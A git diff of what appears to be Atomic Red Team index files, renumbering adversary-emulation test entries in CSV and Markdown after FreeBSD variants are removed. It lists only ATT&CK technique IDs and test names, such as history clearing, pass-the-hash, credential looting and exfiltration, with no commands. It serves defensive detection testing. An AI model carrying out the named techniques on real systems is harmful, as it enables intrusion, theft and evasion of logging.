+execution,T1059.004,Command and Scripting Interpreter: Bash,12,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,sh
+execution,T1059.004,Command and Scripting Interpreter: Bash,13,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts,6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables,0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
@@ -429,11 +411,10 @@ impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/L
 impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
 impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
-initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
-initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
-initial-access,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
+initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
+initial-access,T1078.003,Valid Accounts: Local Accounts,11,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
+initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
 exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv
index 43a55ee54..2e81276e3 100644
--- a/atomics/Indexes/Indexes-CSV/macos-index.csv
+++ b/atomics/Indexes/Indexes-CSV/macos-index.csv
@@ -29,11 +29,11 @@ defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Ma
 defense-evasion,T1070.002,"Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs",17,Delete system log files using Applescript,e62f8694-cbc7-468f-862c-b10cd07e1757,sh
 defense-evasion,T1553.001,Subvert Trust Controls: Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
 defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,5,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,13,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,14,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,4,Clear Bash history (ln dev/null),23d348f3-cc5c-4ba9-bd0a-ae09069f0914,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,3,Base64 decoding with Python,356dc0e8-684f-4428-bb94-9313998ad608,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding with Perl,6604d964-b9f6-4d4b-8ce8-499829a14d0a,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
@@ -138,7 +138,7 @@ collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f05622
 collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
 collection,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
 collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
-collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
+collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
 collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
 collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 collection,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spoofing a credential prompt using osascript,b7037b89-947a-427a-ba29-e7e9f09bc045,bash
@@ -199,8 +199,8 @@ discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b67
 discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
 discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
-discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
-discovery,T1087.001,Account Discovery: Local Account,8,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
+discovery,T1087.001,Account Discovery: Local Account,6,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
+discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,319e9f6c-7a9e-432e-8c62-9385c803b6f2,sh
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
 discovery,T1040,Network Sniffing,3,Packet Capture macOS using tcpdump or tshark,9d04efee-eff5-4240-b8d2-07792b873608,bash
 discovery,T1040,Network Sniffing,8,Packet Capture macOS using /dev/bpfN with sudo,e6fe5095-545d-4c8b-a0ae-e863914be3aa,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index dc14a6dcb..d864e2517 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -76,9 +76,9 @@ defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,9,Msiexec.exe -
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,10,Msiexec.exe - Execute the DllUnregisterServer function of a DLL,ab09ec85-4955-4f9c-b8e0-6851baf4d47f,command_prompt
 defense-evasion,T1218.007,Signed Binary Proxy Execution: Msiexec,11,Msiexec.exe - Execute Remote MSI file,44a4bedf-ffe3-452e-bee4-6925ab125662,command_prompt
 defense-evasion,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,17,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,18,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
-defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,19,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,10,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,11,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell
+defense-evasion,T1070.003,Indicator Removal on Host: Clear Command History,12,Set Custom AddToHistoryHandler to Avoid History File Logging,1d0d9aa6-6111-4f89-927b-53e8afae7f94,powershell
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
 defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe,8b34a448-40d9-4fc3-a8c8-4bb286faf7dc,command_prompt
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
@@ -336,8 +336,8 @@ defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,4,Delete a si
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell
 defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,7,Delete an entire folder - Windows PowerShell,edd779e4-a509-4cba-8dfa-a112543dbfb1,powershell
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
-defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,11,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5f-8418-460acaeb92fb,powershell
+defense-evasion,T1070.004,Indicator Removal on Host: File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
 defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
 defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 defense-evasion,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
@@ -808,7 +808,7 @@ collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e
 collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
 collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
 collection,T1074.001,Data Staged: Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
-collection,T1074.001,Data Staged: Local Data Staging,4,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
+collection,T1074.001,Data Staged: Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
 collection,T1114.001,Email Collection: Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
 collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
 collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
@@ -999,9 +999,9 @@ discovery,T1087.002,Account Discovery: Domain Account,19,Suspicious LAPS Attribu
 discovery,T1087.002,Account Discovery: Domain Account,20,Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope,ffbcfd62-15d6-4989-a21a-80bfc8e58bb5,powershell
 discovery,T1087.002,Account Discovery: Domain Account,21,Suspicious LAPS Attributes Query with adfind all properties,abf00f6c-9983-4d9a-afbc-6b1c6c6448e1,powershell
 discovery,T1087.002,Account Discovery: Domain Account,22,Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd,51a98f96-0269-4e09-a10f-e307779a8b05,powershell
-discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
-discovery,T1087.001,Account Discovery: Local Account,10,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
-discovery,T1087.001,Account Discovery: Local Account,11,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
+discovery,T1087.001,Account Discovery: Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
+discovery,T1087.001,Account Discovery: Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,5,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
 discovery,T1069.002,Permission Groups Discovery: Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 18017eae6..9b5f4763f 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -184,24 +184,17 @@
 - T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
   - Atomic Test #1: Clear Bash history (rm) [linux, macos]
-  - Atomic Test #2: Clear sh history (rm) [linux]
-  - Atomic Test #3: Clear Bash history (echo) [linux]
-  - Atomic Test #4: Clear sh history (echo) [linux]
-  - Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
-  - Atomic Test #6: Clear sh history (cat dev/null) [linux]
-  - Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
-  - Atomic Test #8: Clear sh history (ln dev/null) [linux]
-  - Atomic Test #9: Clear Bash history (truncate) [linux]
-  - Atomic Test #10: Clear sh history (truncate) [linux]
-  - Atomic Test #11: Clear history of a bunch of shells [linux, macos]
-  - Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux]
-  - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
-  - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
-  - Atomic Test #15: Disable Bash History Logging with SSH -T [linux]
-  - Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux]
-  - Atomic Test #17: Prevent Powershell History Logging [windows]
-  - Atomic Test #18: Clear Powershell History by Deleting History File [windows]
-  - Atomic Test #19: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
+  - Atomic Test #2: Clear Bash history (echo) [linux]
+  - Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
+  - Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
+  - Atomic Test #5: Clear Bash history (truncate) [linux]
+  - Atomic Test #6: Clear history of a bunch of shells [linux, macos]
+  - Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
+  - Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
+  - Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
+  - Atomic Test #10: Prevent Powershell History Logging [windows]
+  - Atomic Test #11: Clear Powershell History by Deleting History File [windows]
+  - Atomic Test #12: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
 - [T1202 Indirect Command Execution](../../T1202/T1202.md)
   - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
   - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
@@ -715,9 +708,8 @@
   - Atomic Test #6: Delete a single file - Windows PowerShell [windows]
   - Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
   - Atomic Test #8: Delete Filesystem - Linux [linux]
-  - Atomic Test #9: Delete Filesystem - FreeBSD [linux]
-  - Atomic Test #10: Delete Prefetch File [windows]
-  - Atomic Test #11: Delete TeamViewer Log Files [windows]
+  - Atomic Test #9: Delete Prefetch File [windows]
+  - Atomic Test #10: Delete TeamViewer Log Files [windows]
 - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1221 Template Injection](../../T1221/T1221.md)
   - Atomic Test #1: WINWORD Remote Template Injection [windows]
@@ -797,11 +789,10 @@
   - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
   - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
   - Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
@@ -1187,11 +1178,10 @@
   - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
   - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1324,14 +1314,10 @@
   - Atomic Test #7: What shells are available [linux]
   - Atomic Test #8: Command line scripts [linux]
   - Atomic Test #9: Obfuscated command line scripts [linux]
-  - Atomic Test #10: Obfuscated command line scripts (freebsd) [linux]
-  - Atomic Test #11: Change login shell [linux]
-  - Atomic Test #12: Change login shell (freebsd) [linux]
-  - Atomic Test #13: Environment variable scripts [linux]
-  - Atomic Test #14: Environment variable scripts (freebsd) [linux]
-  - Atomic Test #15: Detecting pipe-to-shell [linux]
-  - Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux]
-  - Atomic Test #17: Current kernel information enumeration [linux]
+  - Atomic Test #10: Change login shell [linux]
+  - Atomic Test #11: Environment variable scripts [linux]
+  - Atomic Test #12: Detecting pipe-to-shell [linux]
+  - Atomic Test #13: Current kernel information enumeration [linux]
 - [T1559 Inter-Process Communication](../../T1559/T1559.md)
   - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows]
   - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows]
@@ -1764,11 +1750,10 @@
   - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
   - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 - [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
   - Atomic Test #1: User scope COR_PROFILER [windows]
   - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -1829,9 +1814,8 @@
 - [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
   - Atomic Test #1: Psiphon [windows]
   - Atomic Test #2: Tor Proxy Usage - Windows [windows]
-  - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
+  - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu/FreeBSD [linux]
   - Atomic Test #4: Tor Proxy Usage - MacOS [macos]
-  - Atomic Test #5: Tor Proxy Usage - FreeBSD [linux]
 - T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1571 Non-Standard Port](../../T1571/T1571.md)
   - Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
@@ -1936,8 +1920,7 @@
 - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
   - Atomic Test #1: Stage data from Discovery.bat [windows]
   - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
-  - Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux]
-  - Atomic Test #4: Zip a Folder with PowerShell for Staging in Temp [windows]
+  - Atomic Test #3: Zip a Folder with PowerShell for Staging in Temp [windows]
 - [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md)
   - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
 - [T1119 Automated Collection](../../T1119/T1119.md)
@@ -2371,12 +2354,11 @@
   - Atomic Test #3: View accounts with UID 0 [linux, macos]
   - Atomic Test #4: List opened files by user [linux, macos]
   - Atomic Test #5: Show if a user account has ever logged in remotely [linux]
-  - Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux]
-  - Atomic Test #7: Enumerate users and groups [linux, macos]
-  - Atomic Test #8: Enumerate users and groups [macos]
-  - Atomic Test #9: Enumerate all accounts on Windows (Local) [windows]
-  - Atomic Test #10: Enumerate all accounts via PowerShell (Local) [windows]
-  - Atomic Test #11: Enumerate logged on users via CMD (Local) [windows]
+  - Atomic Test #6: Enumerate users and groups [linux, macos]
+  - Atomic Test #7: Enumerate users and groups [macos]
+  - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
+  - Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
+  - Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
   - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
@@ -2843,11 +2825,10 @@
   - Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
   - Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
   - Atomic Test #8: Create local account (Linux) [linux]
-  - Atomic Test #9: Create local account (FreeBSD) [linux]
-  - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux]
-  - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux]
-  - Atomic Test #12: Login as nobody (Linux) [linux]
-  - Atomic Test #13: Login as nobody (freebsd) [linux]
+  - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
+  - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
+  - Atomic Test #11: Login as nobody (Linux) [linux]
+  - Atomic Test #12: Login as nobody (freebsd) [linux]
 
 # exfiltration
 - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index 9065addbb..abecd954a 100644
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -62,21 +62,14 @@
 - T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
   - Atomic Test #1: Clear Bash history (rm) [linux, macos]
-  - Atomic Test #2: Clear sh history (rm) [linux]
-  - Atomic Test #3: Clear Bash history (echo) [linux]
-  - Atomic Test #4: Clear sh history (echo) [linux]
-  - Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
-  - Atomic Test #6: Clear sh history (cat dev/null) [linux]
-  - Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
-  - Atomic Test #8: Clear sh history (ln dev/null) [linux]
-  - Atomic Test #9: Clear Bash history (truncate) [linux]
-  - Atomic Test #10: Clear sh history (truncate) [linux]
-  - Atomic Test #11: Clear history of a bunch of shells [linux, macos]
-  - Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux]
-  - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
-  - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
-  - Atomic Test #15: Disable Bash History Logging with SSH -T [linux]
-  - Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux]
+  - Atomic Test #2: Clear Bash history (echo) [linux]
+  - Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
+  - Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
+  - Atomic Test #5: Clear Bash history (truncate) [linux]
+  - Atomic Test #6: Clear history of a bunch of shells [linux, macos]
+  - Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
+  - Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
+  - Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
 - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
   - Atomic Test #3: Base64 decoding with Python [linux, macos]
   - Atomic Test #4: Base64 decoding with Perl [linux, macos]
@@ -220,7 +213,6 @@
   - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
   - Atomic Test #3: Overwrite and delete a file with shred [linux]
   - Atomic Test #8: Delete Filesystem - Linux [linux]
-  - Atomic Test #9: Delete Filesystem - FreeBSD [linux]
 - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
   - Atomic Test #1: Binary simply packed by UPX (linux) [linux]
@@ -237,11 +229,10 @@
